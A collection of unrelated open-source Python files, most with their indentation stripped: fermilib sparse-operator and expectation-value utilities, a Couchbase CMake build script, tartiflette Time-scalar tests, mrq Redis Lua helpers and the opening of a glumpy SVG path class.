        operator(ndarray or sparse): Numpy or scipy.sparse operator acting on
the space of n_qubits.
n_electrons(int): Number of particles to restrict the operator to
n_qubits(int): Number of qubits defining the total state
Returns:
new_operator(ndarray or sparse): Numpy operator restricted to
acting on states with the same particle number.
"""
if n_qubits is None:
n_qubits = int(numpy.log2(operator.shape[0]))
select_indices = jw_number_indices(n_electrons, n_qubits)
return operator[numpy.ix_(select_indices, select_indices)]
def get_density_matrix(states, probabilities):
n_qubits = states[0].shape[0]
density_matrix = scipy.sparse.csc_matrix(
(n_qubits, n_qubits), dtype=complex)
for state, probability in zip(states, probabilities):
density_matrix = density_matrix + probability * state * state.getH()
return density_matrix
def is_hermitian(sparse_operator):
"""Test if matrix is Hermitian."""
difference = sparse_operator - sparse_operator.getH()
if difference.nnz:
discrepancy = max(map(abs, difference.data))
if discrepancy > EQ_TOLERANCE:
return False
return True
def get_ground_state(sparse_operator):
"""Compute lowest eigenvalue and eigenstate.
Returns:
eigenvalue: The lowest eigenvalue, a float.
eigenstate: The lowest eigenstate in scipy.sparse csc format.
"""
if not is_hermitian(sparse_operator):
raise ValueError('sparse_operator must be Hermitian.')
values, vectors = scipy.sparse.linalg.eigsh(
sparse_operator, 2, which='SA', maxiter=1e7)
eigenstate = scipy.sparse.csc_matrix(vectors[:, 0])
eigenvalue = values[0]
return eigenvalue, eigenstate.getH()
def sparse_eigenspectrum(sparse_operator):
"""Perform a dense diagonalization.
Returns:
        eigenspectrum: The sorted eigenvalues in a numpy array.
"""
dense_operator = sparse_operator.todense()
if is_hermitian(sparse_operator):
eigenspectrum = numpy.linalg.eigvalsh(dense_operator)
else:
eigenspectrum = numpy.linalg.eigvals(dense_operator)
return numpy.sort(eigenspectrum)
def expectation(sparse_operator, state):
"""Compute expectation value of operator with a state.
Args:
state: scipy.sparse.csc vector representing a pure state,
or, a scipy.sparse.csc matrix representing a density matrix.
Returns:
A real float giving expectation value.
Raises:
ValueError: Input state has invalid format.
"""
# Handle density matrix.
if state.shape == sparse_operator.shape:
product = state * sparse_operator
expectation = numpy.sum(product.diagonal())
elif state.shape == (sparse_operator.shape[0], 1):
# Handle state vector.
expectation = state.getH() * sparse_operator * state
expectation = expectation[0, 0]
else:
# Handle exception.
raise ValueError('Input state has invalid format.')
# Return.
return expectation
def expectation_computational_basis_state(operator, computational_basis_state):
"""Compute expectation value of operator with a state.
Args:
operator: Qubit or FermionOperator to evaluate expectation value of.
If operator is a FermionOperator, it must be normal-ordered.
computational_basis_state (scipy.sparse vector / list): normalized
computational basis state (if scipy.sparse vector), or list of
occupied orbitals.
Returns:
A real float giving expectation value.
Raises:
TypeError: Incorrect operator or state type.
"""
if isinstance(operator, QubitOperator):
raise NotImplementedError('Not yet implemented for QubitOperators.')
if not isinstance(operator, FermionOperator):
raise TypeError('operator must be a FermionOperator.')
occupied_orbitals = computational_basis_state
if not isinstance(occupied_orbitals, list):
computational_basis_state_index = (
occupied_orbitals.nonzero()[0][0])
occupied_orbitals = [digit == '1' for digit in
bin(computational_basis_state_index)[2:]][::-1]
expectation_value = operator.terms.get((), 0.0)
for i in range(len(occupied_orbitals)):
if occupied_orbitals[i]:
expectation_value += operator.terms.get(
((i, 1), (i, 0)), 0.0)
for j in range(i + 1, len(occupied_orbitals)):
expectation_value -= operator.terms.get(
((j, 1), (i, 1), (j, 0), (i, 0)), 0.0)
return expectation_value
def expectation_db_operator_with_pw_basis_state(
operator, plane_wave_occ_orbitals, n_spatial_orbitals, grid,
spinless):
"""Compute expectation value of a dual basis operator with a plane
wave computational basis state.
Args:
operator: Dual-basis representation of FermionOperator to evaluate
expectation value of. Can have at most 3-body terms.
plane_wave_occ_orbitals (list): list of occupied plane-wave orbitals.
n_spatial_orbitals (int): Number of spatial orbitals.
grid (fermilib.utils.Grid): The grid used for discretization.
spinless (bool): Whether the system is spinless.
Returns:
A real float giving the expectation value.
"""
expectation_value = operator.terms.get((), 0.0)
for single_action, coefficient in iteritems(operator.terms):
if len(single_action) == 2:
expectation_value += coefficient * (
expectation_one_body_db_operator_computational_basis_state(
single_action, plane_wave_occ_orbitals, grid, spinless) /
n_spatial_orbitals)
elif len(single_action) == 4:
expectation_value += coefficient * (
expectation_two_body_db_operator_computational_basis_state(
single_action, plane_wave_occ_orbitals, grid, spinless) /
n_spatial_orbitals ** 2)
elif len(single_action) == 6:
expectation_value += coefficient * (
expectation_three_body_db_operator_computational_basis_state(
single_action, plane_wave_occ_orbitals, grid, spinless) /
n_spatial_orbitals ** 3)
return expectation_value
def expectation_one_body_db_operator_computational_basis_state(
dual_basis_action, plane_wave_occ_orbitals, grid, spinless):
"""Compute expectation value of a 1-body dual-basis operator with a
plane wave computational basis state.
Args:
dual_basis_action: Dual-basis action of FermionOperator to
evaluate expectation value of.
plane_wave_occ_orbitals (list): list of occupied plane-wave orbitals.
grid (fermilib.utils.Grid): The grid used for discretization.
spinless (bool): Whether the system is spinless.
Returns:
A real float giving the expectation value.
"""
expectation_value = 0.0
r_p = position_vector(grid_indices(dual_basis_action[0][0],
grid, spinless), grid)
r_q = position_vector(grid_indices(dual_basis_action[1][0],
grid, spinless), grid)
for orbital in plane_wave_occ_orbitals:
# If there's spin, p and q have to have the same parity (spin),
# and the new orbital has to have the same spin as these.
k_orbital = momentum_vector(grid_indices(orbital,
grid, spinless), grid)
# The Fourier transform is spin-conserving. This means that p, q,
# and the new orbital all have to have the same spin (parity).
if spinless or (dual_basis_action[0][0] % 2 ==
dual_basis_action[1][0] % 2 == orbital % 2):
expectation_value += numpy.exp(-1j * k_orbital.dot(r_p - r_q))
return expectation_value
def expectation_two_body_db_operator_computational_basis_state(
dual_basis_action, plane_wave_occ_orbitals, grid, spinless):
"""Compute expectation value of a 2-body dual-basis operator with a
plane wave computational basis state.
Args:
dual_basis_action: Dual-basis action of FermionOperator to
evaluate expectation value of.
plane_wave_occ_orbitals (list): list of occupied plane-wave orbitals.
grid (fermilib.utils.Grid): The grid used for discretization.
spinless (bool): Whether the system is spinless.
Returns:
A float giving the expectation value.
"""
expectation_value = 0.0
r_a = position_vector(grid_indices(dual_basis_action[0][0],
grid, spinless), grid)
r_b = position_vector(grid_indices(dual_basis_action[1][0],
grid, spinless), grid)
r_c = position_vector(grid_indices(dual_basis_action[2][0],
grid, spinless), grid)
r_d = position_vector(grid_indices(dual_basis_action[3][0],
grid, spinless), grid)
kac_dict = {}
kad_dict = {}
kbc_dict = {}
kbd_dict = {}
for i in plane_wave_occ_orbitals:
k = momentum_vector(grid_indices(i, grid, spinless), grid)
kac_dict[i] = k.dot(r_a - r_c)
kad_dict[i] = k.dot(r_a - r_d)
kbc_dict[i] = k.dot(r_b - r_c)
kbd_dict[i] = k.dot(r_b - r_d)
for orbital1 in plane_wave_occ_orbitals:
k1ac = kac_dict[orbital1]
k1ad = kad_dict[orbital1]
for orbital2 in plane_wave_occ_orbitals:
if orbital1 != orbital2:
k2bc = kbc_dict[orbital2]
k2bd = kbd_dict[orbital2]
# The Fourier transform is spin-conserving. This means that
# the parity of the orbitals involved in the transition must
# be the same.
if spinless or (
(dual_basis_action[0][0] % 2 ==
dual_basis_action[3][0] % 2 == orbital1 % 2) and
(dual_basis_action[1][0] % 2 ==
dual_basis_action[2][0] % 2 == orbital2 % 2)):
value = numpy.exp(-1j * (k1ad + k2bc))
# Add because it came from two anti-commutations.
expectation_value += value
# The Fourier transform is spin-conserving. This means that
# the parity of the orbitals involved in the transition must
# be the same.
if spinless or (
(dual_basis_action[0][0] % 2 ==
dual_basis_action[2][0] % 2 == orbital1 % 2) and
(dual_basis_action[1][0] % 2 ==
dual_basis_action[3][0] % 2 == orbital2 % 2)):
value = numpy.exp(-1j * (k1ac + k2bd))
# Subtract because it came from a single anti-commutation.
expectation_value -= value
return expectation_value
def expectation_three_body_db_operator_computational_basis_state(
dual_basis_action, plane_wave_occ_orbitals, grid, spinless):
"""Compute expectation value of a 3-body dual-basis operator with a
plane wave computational basis state.
Args:
dual_basis_action: Dual-basis action of FermionOperator to
evaluate expectation value of.
plane_wave_occ_orbitals (list): list of occupied plane-wave orbitals.
grid (fermilib.utils.Grid): The grid used for discretization.
spinless (bool): Whether the system is spinless.
Returns:
A float giving the expectation value.
"""
expectation_value = 0.0
r_a = position_vector(grid_indices(dual_basis_action[0][0],
grid, spinless), grid)
r_b = position_vector(grid_indices(dual_basis_action[1][0],
grid, spinless), grid)
r_c = position_vector(grid_indices(dual_basis_action[2][0],
grid, spinless), grid)
r_d = position_vector(grid_indices(dual_basis_action[3][0],
grid, spinless), grid)
r_e = position_vector(grid_indices(dual_basis_action[4][0],
grid, spinless), grid)
r_f = position_vector(grid_indices(dual_basis_action[5][0],
grid, spinless), grid)
kad_dict = {}
kae_dict = {}
kaf_dict = {}
kbd_dict = {}
kbe_dict = {}
kbf_dict = {}
kcd_dict = {}
kce_dict = {}
kcf_dict = {}
for i in plane_wave_occ_orbitals:
k = momentum_vector(grid_indices(i, grid, spinless), grid)
kad_dict[i] = k.dot(r_a - r_d)
kae_dict[i] = k.dot(r_a - r_e)
kaf_dict[i] = k.dot(r_a - r_f)
kbd_dict[i] = k.dot(r_b - r_d)
kbe_dict[i] = k.dot(r_b - r_e)
kbf_dict[i] = k.dot(r_b - r_f)
kcd_dict[i] = k.dot(r_c - r_d)
kce_dict[i] = k.dot(r_c - r_e)
kcf_dict[i] = k.dot(r_c - r_f)
for orbital1 in plane_wave_occ_orbitals:
k1ad = kad_dict[orbital1]
k1ae = kae_dict[orbital1]
k1af = kaf_dict[orbital1]
for orbital2 in plane_wave_occ_orbitals:
if orbital1 != orbital2:
k2bd = kbd_dict[orbital2]
k2be = kbe_dict[orbital2]
k2bf = kbf_dict[orbital2]
for orbital3 in plane_wave_occ_orbitals:
if orbital1 != orbital3 and orbital2 != orbital3:
k3cd = kcd_dict[orbital3]
k3ce = kce_dict[orbital3]
k3cf = kcf_dict[orbital3]
# Handle \delta_{ad} \delta_{bf} \delta_{ce} after FT.
# The Fourier transform is spin-conserving.
if spinless or (
(dual_basis_action[0][0] % 2 ==
dual_basis_action[3][0] % 2 ==
orbital1 % 2) and
(dual_basis_action[1][0] % 2 ==
dual_basis_action[5][0] % 2 ==
orbital2 % 2) and
(dual_basis_action[2][0] % 2 ==
dual_basis_action[4][0] % 2 ==
orbital3 % 2)):
expectation_value += numpy.exp(-1j * (
k1ad + k2bf + k3ce))
# Handle -\delta_{ad} \delta_{be} \delta_{cf} after FT.
# The Fourier transform is spin-conserving.
if spinless or (
(dual_basis_action[0][0] % 2 ==
dual_basis_action[3][0] % 2 ==
orbital1 % 2) and
(dual_basis_action[1][0] % 2 ==
dual_basis_action[4][0] % 2 ==
orbital2 % 2) and
(dual_basis_action[2][0] % 2 ==
dual_basis_action[5][0] % 2 ==
orbital3 % 2)):
expectation_value -= numpy.exp(-1j * (
k1ad + k2be + k3cf))
# Handle -\delta_{ae} \delta_{bf} \delta_{cd} after FT.
# The Fourier transform is spin-conserving.
if spinless or (
(dual_basis_action[0][0] % 2 ==
dual_basis_action[4][0] % 2 ==
orbital1 % 2) and
(dual_basis_action[1][0] % 2 ==
dual_basis_action[5][0] % 2 ==
orbital2 % 2) and
(dual_basis_action[2][0] % 2 ==
dual_basis_action[3][0] % 2 ==
orbital3 % 2)):
expectation_value -= numpy.exp(-1j * (
k1ae + k2bf + k3cd))
# Handle \delta_{ae} \delta_{bd} \delta_{cf} after FT.
# The Fourier transform is spin-conserving.
if spinless or (
(dual_basis_action[0][0] % 2 ==
dual_basis_action[4][0] % 2 ==
orbital1 % 2) and
(dual_basis_action[1][0] % 2 ==
dual_basis_action[3][0] % 2 ==
orbital2 % 2) and
(dual_basis_action[2][0] % 2 ==
dual_basis_action[5][0] % 2 ==
orbital3 % 2)):
expectation_value += numpy.exp(-1j * (
k1ae + k2bd + k3cf))
# Handle \delta_{af} \delta_{be} \delta_{cd} after FT.
# The Fourier transform is spin-conserving.
if spinless or (
(dual_basis_action[0][0] % 2 ==
dual_basis_action[5][0] % 2 ==
orbital1 % 2) and
(dual_basis_action[1][0] % 2 ==
dual_basis_action[4][0] % 2 ==
orbital2 % 2) and
(dual_basis_action[2][0] % 2 ==
dual_basis_action[3][0] % 2 ==
orbital3 % 2)):
expectation_value += numpy.exp(-1j * (
k1af + k2be + k3cd))
# Handle -\delta_{af} \delta_{bd} \delta_{ce} after FT.
# The Fourier transform is spin-conserving.
if spinless or (
(dual_basis_action[0][0] % 2 ==
dual_basis_action[5][0] % 2 ==
orbital1 % 2) and
(dual_basis_action[1][0] % 2 ==
dual_basis_action[3][0] % 2 ==
orbital2 % 2) and
(dual_basis_action[2][0] % 2 ==
dual_basis_action[4][0] % 2 ==
orbital3 % 2)):
expectation_value -= numpy.exp(-1j * (
k1af + k2bd + k3ce))
return expectation_value
def get_gap(sparse_operator):
"""Compute gap between lowest eigenvalue and first excited state.
Returns: A real float giving eigenvalue gap.
"""
if not is_hermitian(sparse_operator):
raise ValueError('sparse_operator must be Hermitian.')
values, _ = scipy.sparse.linalg.eigsh(
sparse_operator, 2, which='SA', maxiter=1e7)
gap = abs(values[1] - values[0])
return gap
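A small sketch of how these helpers chain together, using a toy two-mode Hamiltonian chosen only for illustration (it is not drawn from the module or its tests).

from fermilib.ops import FermionOperator
from fermilib.utils._sparse_tools import (
    jordan_wigner_sparse, get_ground_state, get_gap)

# Hermitian toy Hamiltonian: two number operators plus a hopping term.
hamiltonian = (FermionOperator('0^ 0', 2.0) +
               FermionOperator('1^ 1', -1.0) +
               FermionOperator('0^ 1', 0.5) +
               FermionOperator('1^ 0', 0.5))

sparse_hamiltonian = jordan_wigner_sparse(hamiltonian, n_qubits=2)
energy, ground_state = get_ground_state(sparse_hamiltonian)
print(energy, get_gap(sparse_hamiltonian))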
cmake_build.py | couchbase/couchbase-python-client | 189 | 100604 |
#
# Copyright 2019, Couchbase, Inc.
# All Rights Reserved
#
# Licensed under the Apache License, Version 2.0 (the "License")
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os.path
import platform
import re
import subprocess
import sys
from distutils.version import LooseVersion
from setuptools import Extension
from setuptools.command.build_ext import build_ext
import cbuild_config
from gen_config import win_cmake_path
from cbuild_config import couchbase_core, build_type
import logging
import traceback
PYCBC_SSL_FETCH = os.getenv('PYCBC_SSL_FETCH', '')
class CMakeExtension(Extension):
def __init__(self, name, sourcedir='', **kw):
Extension.__init__(self, name, **kw)
self.sourcedir = os.path.abspath(sourcedir)
class CMakeBuild(cbuild_config.CBuildCommon):
hasrun = False
hasbuilt = False
hybrid = False
info = None # type: cbuild_config.CBuildInfo
def run(self):
if not CMakeBuild.hasrun:
out = self.check_for_cmake()
if not out:
raise RuntimeError(
"CMake must be installed to build the following extensions: " +
", ".join(e.name for e in self.extensions))
if platform.system() == "Windows":
cmake_version = LooseVersion(re.search(r'version\s*([\d.]+)',
out.decode()).group(1))
if cmake_version < '3.5.1':
raise RuntimeError("CMake >= 3.5.1 is required on Windows")
CMakeBuild.hasrun = True
if CMakeBuild.hybrid:
build_ext.run(self)
for ext in self.extensions:
self.build_extension(ext)
@staticmethod
def check_for_cmake():
try:
return subprocess.check_output(['cmake', '--version'])
except BaseException:
return None
@staticmethod
def requires():
base_req = []
if re.match(r'.*(CONAN|ALL).*', PYCBC_SSL_FETCH):
base_req.append('conan')
if re.match(r'.*(GITHUB_API|ALL).*', PYCBC_SSL_FETCH):
base_req.append('PyGithub')
return base_req + ([] if CMakeBuild.check_for_cmake() else ["cmake"])
def prep_build(self, ext):
if not CMakeBuild.hasbuilt:
from distutils.sysconfig import get_python_inc
import distutils.sysconfig as sysconfig
cfg = self.cfg_type()
extdir = os.path.abspath(
os.path.dirname(self.get_ext_fullpath(ext.name)))
lcb_api_flags = self.get_lcb_api_flags()
cmake_args = lcb_api_flags + ['-DCMAKE_LIBRARY_OUTPUT_DIRECTORY=' + extdir,
'-DPYTHON_EXECUTABLE=' + sys.executable]
cmake_args += ['-DPYTHON_INCLUDE_DIR={}'.format(get_python_inc())]
self.info.setbase(self.build_temp)
self.info.cfg = cfg
from distutils import sysconfig
import os.path as op
v = sysconfig.get_config_vars()
print("LIBDIR {}, LIBPL {}".format(
v.get("LIBDIR"), v.get("LIBPL")))
fpaths = [op.join(v.get(pv, ''), v.get('LDLIBRARY', '')) for pv in ('LIBDIR', 'LIBPL')] + [os.path.normpath(
os.path.join(get_python_inc(), "..", "..", "lib",
"libpython{}.dylib".format('.'.join(map(str, sys.version_info[0:2]))))),
os.path.join(get_python_inc(), "..", "..", "lib")]
python_lib = None
python_libdir = None
for entry in fpaths:
if not op.exists(entry):
print("fpath {} does not exist".format(entry))
continue
try:
print("got fpath {}:".format(entry))
if op.isfile(entry):
print("fpath {} is file, selecting".format(entry))
python_lib = python_lib or entry
continue
else:
entries = os.listdir(entry)
print("fpath {} is directory, contents {}".format(
entry, entries))
for subentry in entries:
fullname = op.normpath(op.join(entry, subentry))
try:
fullname = op.readlink(fullname)
except BaseException:
pass
print("trying subentry:{}".format(fullname))
if op.exists(fullname):
python_lib = python_lib or fullname
python_libdir = op.normpath(entry)
print(
"got match {}, breaking out".format(fullname))
continue
except BaseException:
pass
cmake_args += ['-DHYBRID_BUILD=TRUE'] if CMakeBuild.hybrid else []
cmake_args += ['-DPYTHON_LIBFILE={}'.format(
python_lib)] if python_lib else []
cmake_args += ['-DPYTHON_LIBDIR={}'.format(
python_libdir)] if python_libdir else []
cmake_args += [
'-DPYTHON_VERSION_EXACT={}'.format('.'.join(map(str, sys.version_info[0:2])))] if python_libdir else []
build_args = ['--config', cfg]
if platform.system() == "Windows":
cmake_args += ['-DCMAKE_LIBRARY_OUTPUT_DIRECTORY_{}={}'.format(
cfg.upper(),
extdir), '-DLCB_NO_MOCK=1',
'-DCMAKE_BUILD_PARALLEL_LEVEL=1']
if sys.maxsize > 2 ** 32:
cmake_args += ['-A', 'x64']
build_args += ['--', '/m']
else:
cmake_args += ['-DCMAKE_BUILD_TYPE=' + cfg.upper()]
build_args += ['--', '-j2']
env = os.environ.copy()
python_executable = win_cmake_path(sys.executable)
pass_path = False
if re.match(r'.*(CONAN|ALL).*', PYCBC_SSL_FETCH):
try:
import conans.conan
env['PATH'] = env['PATH'] + \
";{}".format(os.path.dirname(conans.conan.__file__))
pass_path = True
except BaseException:
logging.warning("Cannot find conan : {}".format(
traceback.format_exc()))
if re.match(r'.*(GITHUB|ALL).*', PYCBC_SSL_FETCH):
pass_path = True
if pass_path:
pathsep = ';' if platform.system().lower().startswith('win') else ':'
env['PYTHONPATH'] = pathsep.join(sys.path)
cmake_args += [
'-DCMAKE_VERBOSE_MAKEFILE:BOOL=ON',
'-DPYTHON_EXECUTABLE={}'.format(python_executable)]
if PYCBC_SSL_FETCH:
cmake_args += ['-DPYCBC_SSL_FETCH={}'.format(PYCBC_SSL_FETCH)]
PYCBC_CMAKE_DEBUG = env.get('PYCBC_CMAKE_DEBUG')
if PYCBC_CMAKE_DEBUG:
cmake_args += [
'--trace-source=CMakeLists.txt',
'--trace-expand']
cxx_compile_args = filter(re.compile(
r'^(?!-std\s*=\s*c(11|99)).*').match, ext.extra_compile_args)
env['CXXFLAGS'] = '{} {} -DVERSION_INFO=\\"{}\\"'.format(
env.get('CXXFLAGS', ''), ' '.join(cxx_compile_args),
self.distribution.get_version())
env['CFLAGS'] = '{} {}'.format(
env.get('CFLAGS', ''), ' '.join(ext.extra_compile_args),
self.distribution.get_version())
print("Launching build with env: {}, build_args: {}, cmake_args: {}".format(
env, build_args, cmake_args))
if not os.path.exists(self.build_temp):
os.makedirs(self.build_temp)
subprocess.check_call(['cmake', ext.sourcedir] + cmake_args, stdout=sys.stdout, stderr=sys.stdout,
cwd=self.build_temp, env=env)
subprocess.check_call(['cmake', '--build', '.'] + build_args,
cwd=self.build_temp)
CMakeBuild.hasbuilt = True
build_dir = os.path.realpath(self.build_lib)
if CMakeBuild.hybrid:
if not self.compiler:
self.run()
for name in self.info.entries():
try:
pkg_build_dir = os.path.join(
build_dir, cbuild_config.couchbase_core)
self.copy_binary_to(cfg, pkg_build_dir,
self.info.lcb_pkgs_srcs(), name)
self.copy_binary_to(
cfg, self.info.pkg_data_dir, self.info.lcb_pkgs_srcs(), name)
except BaseException:
print("failure")
raise
def gen_cmake_build(extoptions, pkgdata):
CMakeBuild.hybrid = build_type in ['CMAKE_HYBRID']
CMakeBuild.setup_build_info(extoptions, pkgdata)
e_mods = [CMakeExtension(
str(couchbase_core + '._libcouchbase'), '', **extoptions)]
return e_mods, CMakeBuild.requires(), cbuild_config.LazyCommandClass(CMakeBuild)
tests/unit/scalar/test_time.py | matt-koevort/tartiflette | 530 | 100609 |
import datetime
import pytest
from tartiflette.scalar.builtins.time import ScalarTime
@pytest.mark.parametrize(
"value,should_raise_exception,expected",
[
(None, True, "Time cannot represent value: < None >."),
(True, True, "Time cannot represent value: < True >."),
(False, True, "Time cannot represent value: < False >."),
("", True, "Time cannot represent value: < >."),
(0, True, "Time cannot represent value: < 0 >."),
(1, True, "Time cannot represent value: < 1 >."),
(3, True, "Time cannot represent value: < 3 >."),
(0.0, True, "Time cannot represent value: < 0.0 >."),
(1.0, True, "Time cannot represent value: < 1.0 >."),
(3.0, True, "Time cannot represent value: < 3.0 >."),
(0.1, True, "Time cannot represent value: < 0.1 >."),
(1.1, True, "Time cannot represent value: < 1.1 >."),
(3.1, True, "Time cannot represent value: < 3.1 >."),
("0", True, "Time cannot represent value: < 0 >."),
("1", True, "Time cannot represent value: < 1 >."),
("3", True, "Time cannot represent value: < 3 >."),
("0.0", True, "Time cannot represent value: < 0.0 >."),
("1.0", True, "Time cannot represent value: < 1.0 >."),
("3.0", True, "Time cannot represent value: < 3.0 >."),
("0.1", True, "Time cannot represent value: < 0.1 >."),
("1.1", True, "Time cannot represent value: < 1.1 >."),
("3.1", True, "Time cannot represent value: < 3.1 >."),
("0e0", True, "Time cannot represent value: < 0e0 >."),
("1e0", True, "Time cannot represent value: < 1e0 >."),
("3e0", True, "Time cannot represent value: < 3e0 >."),
("0e1", True, "Time cannot represent value: < 0e1 >."),
("1e1", True, "Time cannot represent value: < 1e1 >."),
("3e1", True, "Time cannot represent value: < 3e1 >."),
("0.1e1", True, "Time cannot represent value: < 0.1e1 >."),
("1.1e1", True, "Time cannot represent value: < 1.1e1 >."),
("3.1e1", True, "Time cannot represent value: < 3.1e1 >."),
("0.11e1", True, "Time cannot represent value: < 0.11e1 >."),
("1.11e1", True, "Time cannot represent value: < 1.11e1 >."),
("3.11e1", True, "Time cannot represent value: < 3.11e1 >."),
(float("inf"), True, "Time cannot represent value: < inf >."),
("A", True, "Time cannot represent value: < A >."),
("{}", True, "Time cannot represent value: < {} >."),
({}, True, "Time cannot represent value: < {} >."),
(Exception("LOL"), True, "Time cannot represent value: < LOL >."),
(
Exception,
True,
"Time cannot represent value: < <class 'Exception'> >.",
),
("15:52:52", True, "Time cannot represent value: < 15:52:52 >."),
(datetime.datetime(1970, 11, 10, 15, 52, 52), False, "15:52:52"),
],
)
def test_scalar_time_coerce_output(value, should_raise_exception, expected):
if should_raise_exception:
with pytest.raises(TypeError, match=expected):
ScalarTime().coerce_output(value)
else:
assert ScalarTime().coerce_output(value) == expected
@pytest.mark.parametrize(
"value,should_raise_exception,expected",
[
(None, True, "Time cannot represent value: < None >."),
(True, True, "Time cannot represent value: < True >."),
(False, True, "Time cannot represent value: < False >."),
("", True, "Time cannot represent value: < >."),
(0, True, "Time cannot represent value: < 0 >."),
(1, True, "Time cannot represent value: < 1 >."),
(3, True, "Time cannot represent value: < 3 >."),
(0.0, True, "Time cannot represent value: < 0.0 >."),
(1.0, True, "Time cannot represent value: < 1.0 >."),
(3.0, True, "Time cannot represent value: < 3.0 >."),
(0.1, True, "Time cannot represent value: < 0.1 >."),
(1.1, True, "Time cannot represent value: < 1.1 >."),
(3.1, True, "Time cannot represent value: < 3.1 >."),
("0", True, "Time cannot represent value: < 0 >."),
("1", True, "Time cannot represent value: < 1 >."),
("3", True, "Time cannot represent value: < 3 >."),
("0.0", True, "Time cannot represent value: < 0.0 >."),
("1.0", True, "Time cannot represent value: < 1.0 >."),
("3.0", True, "Time cannot represent value: < 3.0 >."),
("0.1", True, "Time cannot represent value: < 0.1 >."),
("1.1", True, "Time cannot represent value: < 1.1 >."),
("3.1", True, "Time cannot represent value: < 3.1 >."),
("0e0", True, "Time cannot represent value: < 0e0 >."),
("1e0", True, "Time cannot represent value: < 1e0 >."),
("3e0", True, "Time cannot represent value: < 3e0 >."),
("0e1", True, "Time cannot represent value: < 0e1 >."),
("1e1", True, "Time cannot represent value: < 1e1 >."),
("3e1", True, "Time cannot represent value: < 3e1 >."),
("0.1e1", True, "Time cannot represent value: < 0.1e1 >."),
("1.1e1", True, "Time cannot represent value: < 1.1e1 >."),
("3.1e1", True, "Time cannot represent value: < 3.1e1 >."),
("0.11e1", True, "Time cannot represent value: < 0.11e1 >."),
("1.11e1", True, "Time cannot represent value: < 1.11e1 >."),
("3.11e1", True, "Time cannot represent value: < 3.11e1 >."),
(float("inf"), True, "Time cannot represent value: < inf >."),
("A", True, "Time cannot represent value: < A >."),
("{}", True, "Time cannot represent value: < {} >."),
({}, True, "Time cannot represent value: < {} >."),
(Exception("LOL"), True, "Time cannot represent value: < LOL >."),
(
Exception,
True,
"Time cannot represent value: < <class 'Exception'> >.",
),
("15:52:52", False, datetime.datetime(1900, 1, 1, 15, 52, 52)),
(
datetime.datetime(1970, 11, 10, 15, 52, 52),
True,
"Time cannot represent value: < 1970-11-10 15:52:52 >.",
),
],
)
def test_scalar_time_coerce_input(value, should_raise_exception, expected):
if should_raise_exception:
with pytest.raises(TypeError, match=expected):
ScalarTime().coerce_input(value)
else:
assert ScalarTime().coerce_input(value) == expected
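Distilled from the parameterizations above, the coercion contract the tests pin down is roughly the following (the values are copied from the cases above):

import datetime
from tartiflette.scalar.builtins.time import ScalarTime

scalar = ScalarTime()
# Output coercion turns a datetime into its "HH:MM:SS" string form.
assert scalar.coerce_output(datetime.datetime(1970, 11, 10, 15, 52, 52)) == "15:52:52"
# Input coercion parses "HH:MM:SS" into a datetime with the default 1900-01-01 date.
assert scalar.coerce_input("15:52:52") == datetime.datetime(1900, 1, 1, 15, 52, 52)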
mrq/redishelpers.py | fredstro/mrq | 745 | 100624 |
from future.builtins import range
from .utils import memoize
from . import context
def redis_key(name, *args):
prefix = context.get_current_config()["redis_prefix"]
if name == "known_subqueues":
return "%s:ksq:%s" % (prefix, args[0].root_id)
elif name == "queue":
return "%s:q:%s" % (prefix, args[0].id)
elif name == "started_jobs":
return "%s:s:started" % prefix
elif name == "paused_queues":
return "%s:s:paused" % prefix
elif name == "notify":
return "%s:notify:%s" % (prefix, args[0].root_id)
@memoize
def redis_zaddbyscore():
""" Increments multiple keys in a sorted set & returns them """
return context.connections.redis.register_script("""
local zset = KEYS[1]
local min = ARGV[1]
local max = ARGV[2]
local offset = ARGV[3]
local count = ARGV[4]
local score = ARGV[5]
local data = redis.call('zrangebyscore', zset, min, max, 'LIMIT', offset, count)
for i, member in pairs(data) do
redis.call('zadd', zset, score, member)
end
return data
""")
@memoize
def redis_zpopbyscore():
""" Pops multiple keys by score """
return context.connections.redis.register_script("""
local zset = KEYS[1]
local min = ARGV[1]
local max = ARGV[2]
local offset = ARGV[3]
local count = ARGV[4]
local data = redis.call('zrangebyscore', zset, min, max, 'LIMIT', offset, count)
if #data > 0 then
redis.call('zremrangebyrank', zset, 0, #data - 1)
end
return data
""")
@memoize
def redis_lpopsafe():
""" Safe version of LPOP that also adds the key in a "started" zset """
return context.connections.redis.register_script("""
local key = KEYS[1]
local zset_started = KEYS[2]
local count = ARGV[1]
local now = ARGV[2]
local left = ARGV[3]
local data = {}
local current = nil
for i=1, count do
if left == '1' then
current = redis.call('lpop', key)
else
current = redis.call('rpop', key)
end
if current == false then
return data
end
data[i] = current
redis.call('zadd', zset_started, now, current)
end
return data
""")
def redis_group_command(command, cnt, redis_key):
with context.connections.redis.pipeline(transaction=False) as pipe:
for _ in range(cnt):
getattr(pipe, command)(redis_key)
return [x for x in pipe.execute() if x]
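# Hypothetical usage sketch (not part of mrq; the queue object and timestamp are illustrative).
# register_script() returns a redis-py Script object that is invoked with keys/args, e.g.:
#
#   script = redis_zpopbyscore()
#   popped = script(keys=[redis_key("queue", queue)],
#                   args=["-inf", time.time(), 0, 100])
#
# which pops up to 100 members whose score is <= now from that queue's sorted set.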
|
glumpy/geometry/path.py
|
antoineMoPa/glumpy
| 1,074 |
100662
|
# -----------------------------------------------------------------------------
# Copyright (c) 2009-2016 <NAME>. All rights reserved.
# Distributed under the (new) BSD License.
# -----------------------------------------------------------------------------
import re
import string
import numpy as np
from . import arc, curves
class Path(object):
# ---------------------------------
def __init__(self):
self.vertices = []
self.current = None
self.last_control3 = None
self.last_control4 = None
# ---------------------------------
def svg_parse(self, cmd, points):
        relative = cmd.islower()
        cmd = cmd.upper()
if cmd == 'M': self.moveto(points,relative)
elif cmd == 'Z': self.close()
elif cmd == 'L': self.lineto(points,relative)
elif cmd == 'H': self.horizontal_lineto(points,relative)
elif cmd == 'V': self.vertical_lineto(points,relative)
elif cmd == 'C': self.curveto(points,relative)
elif cmd == 'Q': self.quadratic_curveto(points,relative)
elif cmd == 'A': self.elliptical_arc(points, relative)
# ---------------------------------
def moveto(self, points, relative = False):
ox,oy = 0,0
if len(self.vertices) and len(self.vertices[-1]) <= 1:
del self.vertices[-1]
self.vertices.append([])
